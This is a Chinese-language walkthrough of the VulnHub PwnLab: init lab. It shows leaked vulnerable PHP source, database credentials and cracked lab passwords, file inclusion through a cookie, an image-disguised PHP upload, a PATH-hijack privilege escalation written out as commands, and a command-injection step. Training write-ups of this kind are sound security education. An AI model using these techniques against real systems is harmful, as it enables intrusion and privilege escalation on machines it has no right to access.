2026-04-01

PwnLab: init

项目地址：https://download.vulnhub.com/pwnlab/pwnlab_init.ova

是一个打包好的镜像文件

注意：导入 vmx 时一定要选择我已移动，否则没网

使用 Nmap 扫描出开放服务及操作系统版本

本地文件包含

page（PHP 伪协议）

发现 URL 参数是 ?page 的形式来切换不同的页面，推测存在任意文件读取漏洞

尝试任意文件读取无果，换本地文件包含试试

利用伪协议成功读取到源码

解码拿到源码

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>
</body>
</html>

看看登录的源码，使用了预处理就不能测 SQL 了

但是看到包含了一个 config.php

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
	$luser = $_POST['user'];
	$lpass = base64_encode($_POST['pass']);

	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
	$stmt->bind_param('ss', $luser, $lpass);

	$stmt->execute();
	$stmt->store_Result();

	if ($stmt->num_rows == 1)
	{
		$_SESSION['user'] = $luser;
		header('Location: ?page=upload');
	}
	else
	{
		echo "Login failed.";
	}
}
else
{
	?>
	<form action="" method="POST">
	<label>Username: </label><input id="user" type="test" name="user"><br />
	<label>Password: </label><input id="pass" type="password" name="pass"><br />
	<input type="submit" name="submit" value="Login">
	</form>
	<?php
}

解码拿到数据库信息

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?

在首页的源码中我们可以发现 Cookie 是使用的文件包含函数

if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}

但是在 page 参数中，我们的文件会被加上后缀 .php

if (isset($_GET['page']))
{
    include($_GET['page'].".php");
}

所以这就是为什么，你通过 page 参数的文件包含漏洞打 RCE 不可行的原因，这里要换 Cookie 来打

弱口令

MySQL

因为前面扫描出开放了 3306 端口，所以尝试连接

1	mysql --host=192.168.187.161 -u root -p -D Users --ssl=0

只有一个用户表，拿到用户名密码

得到三个用户的 Base64 编码密码：

kent：Sld6WHVCSkpOeQ== → 解码为 JWzXuBJJNy
mike：U0lmZHNURW42SQ== → 解码为 SIfdsTEn6I
kane：aVN2NVltMkdSbw== → 解码为 iSv5Ym2GRo

PWNLAB

使用上面的账号密码登录网站

RCE

Upload（本地文件包含）

利用前面的本地文件包含读取源码

后缀有白名单，MIME 也有白名单

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
	<body>
		<form action='' method='post' enctype='multipart/form-data'>
			<input type='file' name='file' id='file' />
			<input type='submit' name='submit' value='Upload'/>
		</form>
	</body>
</html>
<?php 
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename  = $_FILES['file']['name'];
		$filetype  = $_FILES['file']['type'];
		$uploaddir = 'upload/';
		$file_ext  = strrchr($filename, '.');
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png"); 

		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}

		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}

		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}

		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}

		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\"><br />";
		} else {
			die('Error 4');
		}
	}
}

?>

思路是上传一个包含 GIF 头的 PHP 文件，然后利用本地文件包含执行代码

GIF87a

找到重命名后的文件

这里的文件包含步骤参考上面的第二个参数 Cookie

成功连接上

提权

敏感信息泄露

利用前面爆出的账号密码切换用户

环境变量劫持

发现家目录下面有一个可执行文件，执行发现调用的 cat 命令

通过修改 PATH 环境变量，将恶意 cat 指向 /bin/bash

cd /tmp
echo '/bin/bash' > cat
chmod 777 cat
export PATH=/tmp:$PATH
cd /home/kane && ./msgmike

成功提权到 mike 用户

命令执行（&& 绕过）

发现这个用户家目录下面有一个可执行文件

执行后打印用户输入内容

使用 && 拼接命令提权